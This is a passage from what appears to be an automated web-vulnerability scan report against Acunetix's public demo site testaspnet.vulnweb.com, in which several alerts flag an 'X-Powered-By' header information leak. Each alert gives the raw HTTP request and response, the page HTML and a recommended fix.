          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        16. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        17. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        18. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        19. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
